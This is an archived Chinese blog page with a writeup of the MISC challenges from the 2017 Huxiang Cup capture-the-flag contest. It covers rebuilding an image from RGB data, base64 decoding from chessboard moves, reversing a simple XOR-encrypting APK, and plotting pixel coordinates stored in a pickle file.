<!DOCTYPE html>
<html style="display: none;" lang="zh">
    <head>
    <meta charset="utf-8">
    <!--
        © Material Theme
        https://github.com/viosey/hexo-theme-material
        Version: 1.5.2 -->
    <script>
        window.materialVersion = "1.5.2"
        // Delete localstorage with these tags
        window.oldVersion = [
            'codestartv1',
            '1.3.4',
            '1.4.0',
            '1.4.0b1',
            '1.5.0'
        ]
    </script>

    <!-- dns prefetch -->
    <meta http-equiv="x-dns-prefetch-control" content="on">

    <link rel="dns-prefetch" href="https://cache-1253916356.file.myqcloud.com/source"/>


    <link rel="dns-prefetch" href="https://cdn1.lncld.net"/>


    <link rel="dns-prefetch" href="https://busuanzi.ibruce.info"/>












    <!-- Meta & Info -->
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">

    <!-- Title -->
    
    <title>
        
            2017年湖湘杯网络安全技能大赛Writeup | 
        
        AresX&#39;s Blog
    </title>

    <!-- Favicons -->
    <link rel="icon shortcut" type="image/ico" href="https://cache-1253916356.file.myqcloud.com/img/favicon.png">
    <link rel="icon" href="https://cache-1253916356.file.myqcloud.com/img/favicon.png">

    <meta name="format-detection" content="telephone=no"/>
    <meta name="description" itemprop="description" content="There is no description">
    <meta name="keywords" content="AresX&#39;s Blog,AresX,Aresx 博客,Writeup,湖湘杯">
    <meta name="theme-color" content="#0097A7">

    <!-- Disable Fucking Bloody Baidu Tranformation -->
    <meta http-equiv="Cache-Control" content="no-transform" />
    <meta http-equiv="Cache-Control" content="no-siteapp" />

    <!--[if lte IE 9]>
        <link rel="stylesheet" href="/css/ie-blocker.css">

        
            <script src="/js/ie-blocker.zhCN.js"></script>
        
    <![endif]-->

    <!-- Import lsloader -->
    <script>(function(){window.lsloader={jsRunSequence:[],jsnamemap:{},cssnamemap:{}};lsloader.removeLS=function(a){try{localStorage.removeItem(a)}catch(b){}};lsloader.setLS=function(a,c){try{localStorage.setItem(a,c)}catch(b){}};lsloader.getLS=function(a){var c="";try{c=localStorage.getItem(a)}catch(b){c=""}return c};versionString="/*"+(window.materialVersion||"unknownVersion")+"*/";lsloader.clean=function(){try{var b=[];for(var a=0;a<localStorage.length;a++){b.push(localStorage.key(a))}b.forEach(function(e){var f=lsloader.getLS(e);if(window.oldVersion){var d=window.oldVersion.reduce(function(g,h){return g||f.indexOf("/*"+h+"*/")!==-1},false);if(d){lsloader.removeLS(e)}}})}catch(c){}};lsloader.clean();lsloader.load=function(f,a,b,d){if(typeof b==="boolean"){d=b;b=undefined}d=d||false;b=b||function(){};var e;e=this.getLS(f);if(e&&e.indexOf(versionString)===-1){this.removeLS(f);this.requestResource(f,a,b,d);return}if(e){var c=e.split(versionString)[0];if(c!=a){console.log("reload:"+a);this.removeLS(f);this.requestResource(f,a,b,d);return}e=e.split(versionString)[1];if(d){this.jsRunSequence.push({name:f,code:e});this.runjs(a,f,e)}else{document.getElementById(f).appendChild(document.createTextNode(e));b()}}else{this.requestResource(f,a,b,d)}};lsloader.requestResource=function(b,e,a,c){var d=this;if(c){this.iojs(e,b,function(h,f,g){d.setLS(f,h+versionString+g);d.runjs(h,f,g)})}else{this.iocss(e,b,function(f){document.getElementById(b).appendChild(document.createTextNode(f));d.setLS(b,e+versionString+f)},a)}};lsloader.iojs=function(d,b,g){var a=this;a.jsRunSequence.push({name:b,code:""});try{var f=new XMLHttpRequest();f.open("get",d,true);f.onreadystatechange=function(){if(f.readyState==4){if((f.status>=200&&f.status<300)||f.status==304){if(f.response!=""){g(d,b,f.response);return}}a.jsfallback(d,b)}};f.send(null)}catch(c){a.jsfallback(d,b)}};lsloader.iocss=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.iofonts=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.runjs=function(f,c,e){if(!!c&&!!e){for(var b in this.jsRunSequence){if(this.jsRunSequence[b].name==c){this.jsRunSequence[b].code=e}}}if(!!this.jsRunSequence[0]&&!!this.jsRunSequence[0].code&&this.jsRunSequence[0].status!="failed"){var a=document.createElement("script");a.appendChild(document.createTextNode(this.jsRunSequence[0].code));a.type="text/javascript";document.getElementsByTagName("head")[0].appendChild(a);this.jsRunSequence.shift();if(this.jsRunSequence.length>0){this.runjs()}}else{if(!!this.jsRunSequence[0]&&this.jsRunSequence[0].status=="failed"){var d=this;var a=document.createElement("script");a.src=this.jsRunSequence[0].path;a.type="text/javascript";this.jsRunSequence[0].status="loading";a.onload=function(){d.jsRunSequence.shift();if(d.jsRunSequence.length>0){d.runjs()}};document.body.appendChild(a)}}};lsloader.tagLoad=function(b,a){this.jsRunSequence.push({name:a,code:"",path:b,status:"failed"});this.runjs()};lsloader.jsfallback=function(c,b){if(!!this.jsnamemap[b]){return}else{this.jsnamemap[b]=b}for(var a in this.jsRunSequence){if(this.jsRunSequence[a].name==b){this.jsRunSequence[a].code="";this.jsRunSequence[a].status="failed";this.jsRunSequence[a].path=c}}this.runjs()};lsloader.cssfallback=function(e,c,b){if(!!this.cssnamemap[c]){return}else{this.cssnamemap[c]=1}var d=document.createElement("link");d.type="text/css";d.href=e;d.rel="stylesheet";d.onload=d.onerror=b;var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(d,a)};lsloader.runInlineScript=function(c,b){var a=document.getElementById(b).innerText;this.jsRunSequence.push({name:c,code:a});this.runjs()}})();</script>

    <!-- Import queue -->
    <script>function Queue(){this.dataStore=[];this.offer=b;this.poll=d;this.execNext=a;this.debug=false;this.startDebug=c;function b(e){if(this.debug){console.log("Offered a Queued Function.")}if(typeof e==="function"){this.dataStore.push(e)}else{console.log("You must offer a function.")}}function d(){if(this.debug){console.log("Polled a Queued Function.")}return this.dataStore.shift()}function a(){var e=this.poll();if(e!==undefined){if(this.debug){console.log("Run a Queued Function.")}e()}}function c(){this.debug=true}}var queue=new Queue();</script>

    <!-- Import CSS -->
    
        <style id="material_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_css","https://cache-1253916356.file.myqcloud.com/source/css/material.min.css",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>
        <style id="style_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("style_css","https://cache-1253916356.file.myqcloud.com/source/css/style.min.css",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>

        
            
                <style id="prettify_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("prettify_css","https://cache-1253916356.file.myqcloud.com/source/css/prettify.min.css",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>
                <style id="prettify_theme"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("prettify_theme","https://cache-1253916356.file.myqcloud.com/source/css/prettify/hemisu-dark.min.css",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>
            
        

    

    

    <!-- Config CSS -->

<!-- Other Styles -->
<style>
  body, html {
    font-family: Roboto, "Helvetica Neue", Helvetica, "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei", "微软雅黑", Arial, sans-serif;
    overflow-x: hidden !important;
  }
  
  code {
    font-family: Consolas, Monaco, 'Andale Mono', 'Ubuntu Mono', monospace;
  }

  a {
    color: #363636;
  }

  .mdl-card__media,
  #search-label,
  #search-form-label:after,
  #scheme-Paradox .hot_tags-count,
  #scheme-Paradox .sidebar_archives-count,
  #scheme-Paradox .sidebar-colored .sidebar-header,
  #scheme-Paradox .sidebar-colored .sidebar-badge{
    background-color: #D3D3D3 !important;
  }

  /* Sidebar User Drop Down Menu Text Color */
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:hover,
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:focus {
    color: #D3D3D3 !important;
  }

  #post_entry-right-info,
  .sidebar-colored .sidebar-nav li:hover > a,
  .sidebar-colored .sidebar-nav li:hover > a i,
  .sidebar-colored .sidebar-nav li > a:hover,
  .sidebar-colored .sidebar-nav li > a:hover i,
  .sidebar-colored .sidebar-nav li > a:focus i,
  .sidebar-colored .sidebar-nav > .open > a,
  .sidebar-colored .sidebar-nav > .open > a:hover,
  .sidebar-colored .sidebar-nav > .open > a:focus,
  #ds-reset #ds-ctx .ds-ctx-entry .ds-ctx-head a {
    color: #D3D3D3 !important;
  }

  .toTop {
    background: #D3D3D3 !important;
  }

  .material-layout .material-post>.material-nav,
  .material-layout .material-index>.material-nav,
  .material-nav a {
    color: #D3D3D3;
  }

  #scheme-Paradox .MD-burger-layer {
    background-color: #D3D3D3;
  }

  #scheme-Paradox #post-toc-trigger-btn {
    color: #D3D3D3;
  }

  .post-toc a:hover {
    color: #363636;
    text-decoration: underline;
  }

</style>


<!-- Theme Background Related-->

    <style>
      body{
        background-image: url(https://cache-1253916356.file.myqcloud.com/img/bg.jpg);
      }
    </style>




<!-- Fade Effect -->

    <style>
      .fade {
        transition: all 800ms linear;
        -webkit-transform: translate3d(0,0,0);
        -moz-transform: translate3d(0,0,0);
        -ms-transform: translate3d(0,0,0);
        -o-transform: translate3d(0,0,0);
        transform: translate3d(0,0,0);
        opacity: 1;
      }

      .fade.out{
        opacity: 0;
      }
    </style>


<!-- Import Font -->
<!-- Import Roboto -->

    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500" rel="stylesheet">


<!-- Import Material Icons -->


    <style id="material_icons"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_icons","https://cache-1253916356.file.myqcloud.com/source/css/material-icons.css",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>




    <!-- Import jQuery -->
    
        <script>lsloader.load("jq_js","https://cache-1253916356.file.myqcloud.com/source/js/jquery.min.js", true)</script>
    

    <!-- WebAPP Icons -->
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="application-name" content="AresX&#39;s Blog">
    <meta name="msapplication-starturl" content="https://ares-x.com/2017/11/26/2017年湖湘杯网络安全技能大赛Writeup/">
    <meta name="msapplication-navbutton-color" content="#0097A7">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-title" content="AresX&#39;s Blog">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon" href="https://cache-1253916356.file.myqcloud.com/img/favicon.png">

    <!-- Site Verification -->
    <meta name="google-site-verification" content="rVqEDFDRIznSgfyvSoh7KIxfhwh6uxZtvgO_Vxr-QDs" />
    <meta name="baidu-site-verification" content="w6yasXXGYf" />

    <!-- RSS -->
    

    <!-- The Open Graph protocol -->
    <meta property="og:url" content="https://ares-x.com/2017/11/26/2017年湖湘杯网络安全技能大赛Writeup/">
    <meta property="og:type" content="blog">
    <meta property="og:title" content="2017年湖湘杯网络安全技能大赛Writeup | AresX&#39;s Blog">
    <meta property="og:image" content="https://cache-1253916356.file.myqcloud.com/img/favicon.png">
    <meta property="og:description" content="There is no description">
    <meta property="og:article:tag" content="Writeup"> <meta property="og:article:tag" content="湖湘杯"> 

    
        <meta property="article:published_time" content="Sun Nov 26 2017 00:35:52 GMT+0800">
        <meta property="article:modified_time" content="Sun Nov 26 2017 11:04:31 GMT+0800">
    

    <!-- The Twitter Card protocol -->
    <meta name="twitter:card" content="summary_large_image">

    <!-- Add canonical link for SEO -->
    
        <link rel="canonical" href="https://ares-x.com/2017/11/26/2017年湖湘杯网络安全技能大赛Writeup/index.html" />
    

    <!-- Structured-data for SEO -->
    
        


<script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "BlogPosting",
    "mainEntityOfPage": "https://ares-x.com/2017/11/26/2017年湖湘杯网络安全技能大赛Writeup/index.html",
    "headline": "2017年湖湘杯网络安全技能大赛Writeup",
    "datePublished": "Sun Nov 26 2017 00:35:52 GMT+0800",
    "dateModified": "Sun Nov 26 2017 11:04:31 GMT+0800",
    "author": {
        "@type": "Person",
        "name": "AresX",
        "image": {
            "@type": "ImageObject",
            "url": "https://cache-1253916356.file.myqcloud.com/img/aresx.png"
        },
        "description": "Anarchy is the key"
    },
    "publisher": {
        "@type": "Organization",
        "name": "AresX&#39;s Blog",
        "logo": {
            "@type":"ImageObject",
            "url": "https://cache-1253916356.file.myqcloud.com/img/favicon.png"
        }
    },
    "keywords": ",Writeup,湖湘杯AresX&#39;s Blog,AresX,Aresx 博客",
    "description": "There is no description",
}
</script>


    

    <!-- Analytics -->
    
    
    

    <!-- Custom Head -->
    
        
            <audio id="bgm" autoplay="autoplay" loop="loop" src="https://cache-1253916356.file.myqcloud.com/Black%20Lab%20-%20This%20Night.mp3"></audio>
        
    

<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>


    
        <body id="scheme-Paradox" class="lazy">
            <div class="material-layout  mdl-js-layout has-drawer is-upgraded">
                

                <!-- Main Container -->
                <main class="material-layout__content" id="main">

                    <!-- Top Anchor -->
                    <div id="top"></div>

                    
                        <!-- Hamburger Button -->
                        <button class="MD-burger-icon sidebar-toggle">
                            <span class="MD-burger-layer"></span>
                        </button>
                    

                    <!-- Post TOC -->

    
    <!-- Back Button -->
    <!--
    <div class="material-back" id="backhome-div" tabindex="0">
        <a class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon"
           href="#" onclick="window.history.back();return false;"
           target="_self"
           role="button"
           data-upgraded=",MaterialButton,MaterialRipple">
            <i class="material-icons" role="presentation">arrow_back</i>
            <span class="mdl-button__ripple-container">
                <span class="mdl-ripple"></span>
            </span>
        </a>
    </div>
    -->


    <!-- Left aligned menu below button -->
    
    
    <button id="post-toc-trigger-btn"
        class="mdl-button mdl-js-button mdl-button--icon">
        <i class="material-icons">format_list_numbered</i>
    </button>

    <ul class="post-toc-wrap mdl-menu mdl-menu--bottom-left mdl-js-menu mdl-js-ripple-effect" for="post-toc-trigger-btn" style="max-height:80vh; overflow-y:scroll;">
        <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#2017年-“湖湘杯”网络安全技能大赛Writeup"><span class="post-toc-number">1.</span> <span class="post-toc-text">2017年 “湖湘杯”网络安全技能大赛Writeup</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#MISC"><span class="post-toc-number">1.1.</span> <span class="post-toc-text">MISC</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#流量分析"><span class="post-toc-number">1.1.1.</span> <span class="post-toc-text">流量分析</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#热身运动"><span class="post-toc-number">1.1.2.</span> <span class="post-toc-text">热身运动</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#题目Encryptor-apk"><span class="post-toc-number">1.1.3.</span> <span class="post-toc-text">题目Encryptor.apk</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#misc300"><span class="post-toc-number">1.1.4.</span> <span class="post-toc-text">misc300</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#WEB"><span class="post-toc-number">1.2.</span> <span class="post-toc-text">WEB</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#web200"><span class="post-toc-number">1.2.1.</span> <span class="post-toc-text">web200:</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#web150-random"><span class="post-toc-number">1.2.2.</span> <span class="post-toc-text">web150 random</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#web300"><span class="post-toc-number">1.2.3.</span> <span class="post-toc-text">web300</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#RE"><span class="post-toc-number">1.3.</span> <span class="post-toc-text">RE</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#简单的Android"><span class="post-toc-number">1.3.1.</span> <span class="post-toc-text">简单的Android</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#RE100"><span class="post-toc-number">1.3.2.</span> <span class="post-toc-text">RE100</span></a></li></ol></li></ol></li></ol>
    </ul>
    




<!-- Layouts -->

    <!-- Post Module -->
    <div class="material-post_container">

        <div class="material-post mdl-grid">
            <div class="mdl-card mdl-shadow--4dp mdl-cell mdl-cell--12-col">

                <!-- Post Header(Thumbnail & Title) -->
                
    <!-- Paradox Post Header -->
    
        
            <!-- Random Thumbnail -->
            <div class="post_thumbnail-random mdl-card__media mdl-color-text--grey-50">
            <script type="text/ls-javascript" id="post-thumbnail-script">
    var randomNum = Math.floor(Math.random() * 19 + 1);

    $('.post_thumbnail-random').attr('data-original', 'https://cache-1253916356.file.myqcloud.com/img/random/material-' + randomNum + '.png');
    $('.post_thumbnail-random').addClass('lazy');
</script>

        
    
            <p class="article-headline-p">
                2017年湖湘杯网络安全技能大赛Writeup
            </p>
        </div>





                
                    <!-- Paradox Post Info -->
                    <div class="mdl-color-text--grey-700 mdl-card__supporting-text meta">

    <!-- Author Avatar -->
    <div id="author-avatar">
        <img src="https://cache-1253916356.file.myqcloud.com/img/aresx.png" width="44px" height="44px" alt="Author Avatar"/>
    </div>
    <!-- Author Name & Date -->
    <div>
        <strong>AresX</strong>
        <span>11月 26, 2017</span>
    </div>

    <div class="section-spacer"></div>

    <!-- Favorite -->
    <!--
        <button id="article-functions-like-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon btn-like">
            <i class="material-icons" role="presentation">favorite</i>
            <span class="visuallyhidden">favorites</span>
        </button>
    -->

    <!-- Qrcode -->
    

    <!-- Tags (bookmark) -->
    
    <button id="article-functions-viewtags-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon">
        <i class="material-icons" role="presentation">bookmark</i>
        <span class="visuallyhidden">bookmark</span>
    </button>
    <ul class="mdl-menu mdl-menu--bottom-right mdl-js-menu mdl-js-ripple-effect" for="article-functions-viewtags-button">
        <li class="mdl-menu__item">
        <a class="post_tag-link" href="/tags/Writeup/">Writeup</a></li><li class="mdl-menu__item"><a class="post_tag-link" href="/tags/湖湘杯/">湖湘杯</a>
    </ul>
    

    <!-- Share -->
    
        <button id="article-fuctions-share-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon">
    <i class="material-icons" role="presentation">share</i>
    <span class="visuallyhidden">share</span>
</button>
<ul class="mdl-menu mdl-menu--bottom-right mdl-js-menu mdl-js-ripple-effect" for="article-fuctions-share-button">
    

    
        
            <!-- Busuanzi Views -->
            <a class="post_share-link" href="#">
                <li class="mdl-menu__item">
                    <span id="busuanzi_container_page_pv">
                        <span id="busuanzi_value_page_pv"></span>&nbsp;浏览量
                    </span>
                </li>
            </a>
        
    

    <!-- Share Weibo -->
    
        <a class="post_share-link" href="http://service.weibo.com/share/share.php?appkey=&title=2017年湖湘杯网络安全技能大赛Writeup&url=https://ares-x.com/2017/11/26/2017年湖湘杯网络安全技能大赛Writeup/index.html&pic=https://ares-x.comhttps://cache-1253916356.file.myqcloud.com/img/favicon.png&searchPic=false&style=simple" target="_blank">
            <li class="mdl-menu__item">
                分享到微博
            </li>
        </a>
    

    <!-- Share Twitter -->
    
        <a class="post_share-link" href="https://twitter.com/intent/tweet?text=2017年湖湘杯网络安全技能大赛Writeup&url=https://ares-x.com/2017/11/26/2017年湖湘杯网络安全技能大赛Writeup/index.html&via=AresX" target="_blank">
            <li class="mdl-menu__item">
                分享到 Twitter
            </li>
        </a>
    

    <!-- Share Facebook -->
    
        <a class="post_share-link" href="https://www.facebook.com/sharer/sharer.php?u=https://ares-x.com/2017/11/26/2017年湖湘杯网络安全技能大赛Writeup/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 Facebook
            </li>
        </a>
    

    <!-- Share Google+ -->
    
        <a class="post_share-link" href="https://plus.google.com/share?url=https://ares-x.com/2017/11/26/2017年湖湘杯网络安全技能大赛Writeup/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 Google+
            </li>
        </a>
    

    <!-- Share LinkedIn -->
    
        <a class="post_share-link" href="https://www.linkedin.com/shareArticle?mini=true&url=https://ares-x.com/2017/11/26/2017年湖湘杯网络安全技能大赛Writeup/index.html&title=2017年湖湘杯网络安全技能大赛Writeup" target="_blank">
            <li class="mdl-menu__item">
                分享到 LinkedIn
            </li>
        </a>
    

    <!-- Share QQ -->
    
        <a class="post_share-link" href="http://connect.qq.com/widget/shareqq/index.html?site=AresX&#39;s Blog&title=2017年湖湘杯网络安全技能大赛Writeup&summary=There is no description&pics=https://ares-x.comhttps://cache-1253916356.file.myqcloud.com/img/favicon.png&url=https://ares-x.com/2017/11/26/2017年湖湘杯网络安全技能大赛Writeup/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 QQ
            </li>
        </a>
    

    <!-- Share Telegram -->
    
        <a class="post_share-link" href="https://telegram.me/share/url?url=https://ares-x.com/2017/11/26/2017年湖湘杯网络安全技能大赛Writeup/index.html&text=2017年湖湘杯网络安全技能大赛Writeup" target="_blank">
            <li class="mdl-menu__item">
                分享到 Telegram
            </li>
        </a>
    
</ul>

    
</div>

                

                <!-- Post Content -->
                <div id="post-content" class="mdl-color-text--grey-700 mdl-card__supporting-text fade out">
    
        <h1 id="2017年-“湖湘杯”网络安全技能大赛Writeup"><a href="#2017年-“湖湘杯”网络安全技能大赛Writeup" class="headerlink" title="2017年 “湖湘杯”网络安全技能大赛Writeup"></a>2017年 “湖湘杯”网络安全技能大赛Writeup</h1><p><em>Misc ak,web差web400,pwn一分没有,re 两道，反正尽力了</em></p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="流量分析"><a href="#流量分析" class="headerlink" title="流量分析"></a>流量分析</h3><p>wireshar导出http文件发现flag.zip</p>
<p><a href="https://i.loli.net/2017/11/25/5a198cec5cbdd.png" target="_blank" rel="external"><img src="https://i.loli.net/2017/11/25/5a198cec5cbdd.png" alt="P_$S5QAY5MQ397_CU7J_ICX.png"></a></p>
<p>打开为rgb</p>
<p><a href="https://i.loli.net/2017/11/25/5a198d6aa102f.png" target="_blank" rel="external"><img src="https://i.loli.net/2017/11/25/5a198d6aa102f.png" alt="KA$7~%GEBVA{$WA%]%CJLF9.png"></a></p>
<p>使用脚本把rgb转换成图片</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> PIL <span class="token keyword">import</span> Image
<span class="token keyword">import</span> re
x <span class="token operator">=</span> <span class="token number">887</span> 
y <span class="token operator">=</span> <span class="token number">150</span> 
image <span class="token operator">=</span> Image<span class="token punctuation">.</span>new<span class="token punctuation">(</span><span class="token string">"RGB"</span><span class="token punctuation">,</span><span class="token punctuation">(</span>x<span class="token punctuation">,</span>y<span class="token punctuation">)</span><span class="token punctuation">)</span>
f <span class="token operator">=</span> open<span class="token punctuation">(</span><span class="token string">'ce.txt'</span><span class="token punctuation">)</span> 
<span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span>x<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">for</span> j <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span>y<span class="token punctuation">)</span><span class="token punctuation">:</span>
        l <span class="token operator">=</span> f<span class="token punctuation">.</span>readline<span class="token punctuation">(</span><span class="token punctuation">)</span>
        r <span class="token operator">=</span> l<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">", "</span><span class="token punctuation">)</span>
        image<span class="token punctuation">.</span>putpixel<span class="token punctuation">(</span><span class="token punctuation">(</span>i<span class="token punctuation">,</span>j<span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token punctuation">(</span>int<span class="token punctuation">(</span>r<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">,</span>int<span class="token punctuation">(</span>r<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">,</span>int<span class="token punctuation">(</span>r<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
image<span class="token punctuation">.</span>save<span class="token punctuation">(</span><span class="token string">'image1.jpg'</span><span class="token punctuation">)</span>
</code></pre>
<p>打开图片得到flag</p>
<p><img src="https://i.loli.net/2017/11/25/5a198dcb32f22.png" alt="XS[V4[KG8F9U)LY_AJ7I]0O.png"></p>
<h3 id="热身运动"><a href="#热身运动" class="headerlink" title="热身运动"></a>热身运动</h3><p>一张gif，一个粉红色的老虎在一个国际象棋的棋盘上瞎j8动</p>
<p>使用Stegoslove查看每一帧记录下老虎移动的坐标</p>
<p><img src="https://i.loli.net/2017/11/25/5a198ea302b79.png" alt="LWRRM38HM6AB9"></p>
<pre><code>5b 4g 2b 4b 5b 2h 3e 2b 5f 8f 1e 2b 7f 6f 1f 4g 5f 6g 1b 3g 5g 6h 2e
</code></pre><p>百度64进制编码得到一张表，对应坐标记录数字</p>
<p><img src="https://i.loli.net/2017/11/25/5a198f3996333.png" alt="YCTGBg"></p>
<pre><code>5b 4g 2b 4b 5b 2h 3e 2b 5f 8f 1e 2b 7f 6f 1f 4g 5f 6g 1b 3g 5g 6h 2e 

25 38 49 33 25 55 44 49 29 5  60 49 13 21 61 38 29 22 57 46 30 23 52
</code></pre><p>再用数字对应base64码表</p>
<p><img src="https://i.loli.net/2017/11/25/5a198f97b3de0.png" alt="72"></p>
<pre><code>25 38 49 33 25 55 44 49 29 5  60 49 13 21 61 38 29 22 57 46 30 23 52
Z  m  x  h  Z  3  s  x  d  F  8  x  N  V  9  m  d  W  5  u  e  X  0
ZmxhZ3sxdF8xNV9mdW5ueX0
</code></pre><p>解最后的base64得到flag<br><code>flag{1t_15_funny}</code></p>
<h3 id="题目Encryptor-apk"><a href="#题目Encryptor-apk" class="headerlink" title="题目Encryptor.apk"></a>题目Encryptor.apk</h3><p>逆向apk</p>
<p><img src="https://i.loli.net/2017/11/25/5a199037e973a.png" alt="0Sng"></p>
<p>得到关键代码</p>
<p><img src="https://i.loli.net/2017/11/25/5a19919951012.png" alt="4Z}H"></p>
<p>加密过程为：<br>j是md5以后的字符串换成字节了以后的长度<br>paramArrayOfByte1[i]是图片的每一个字节<br>用图片的每一个字节和md5字符串的第[i%j]号字节异或</p>
<p>因为是异或加密，解密只需要再加密一次即可得到flag</p>
<p>限制了加密文件必须为图片，把加密后的文件重命名为jpg放进加密机加密，得到flag图片</p>
<p>这是题目修改前的flag图片<br><img src="https://i.loli.net/2017/11/25/5a1992381bfa2.jpg" alt="18F1AD86BA11B5C9653D73180E1DC65E.jpg"></p>
<p>这他妈的字写的什么j8玩意？</p>
<p>题目修改后的图片</p>
<p><img src="https://i.loli.net/2017/11/25/5a19927fc7b68.png" alt=")CAWWIBDU$2`)(T$WE0K4JM.png"></p>
<h3 id="misc300"><a href="#misc300" class="headerlink" title="misc300"></a>misc300</h3><p>题目为pkl后缀名</p>
<p>pkl是python的序列化文件</p>
<p>使用脚本读取之后是一行英文</p>
<p><code>S&#39;The black pixels of a b/w image are at</code></p>
<p>剩下的是很多坐标，使用画图模块绘制散点图</p>
<pre><code>import pickle
from PIL import Image
import matplotlib.pyplot as plt

f = open(&#39;pixels.jpg.pkl&#39;)
inf = pickle.load(f)
f.close()
print inf
print inf[0]
pic=inf[1:]
a=[]
b=[]
for i in pic:
    x=i[0]
    y=i[1]
    print x,y
    a.append(x)
    b.append(y)


plt.scatter(a,b,c = &#39;black&#39;,s = 1)
# plt.plot(a,b,&#39;ko&#39;)
plt.show()
</code></pre><p><img src="https://i.loli.net/2017/11/25/5a199318f2701.png" alt="~png"></p>
<p>把脑袋倒过来看，对</p>
<p>是个漫画人物</p>
<p>漫画名为凯文的幻虎世界，作者Bill Watterson</p>
<p>flag 就是作者的名字<code>billwatterson</code></p>
<p>嗯，cnm啊这尼玛谁想得到？出题人脑子可能有坑</p>
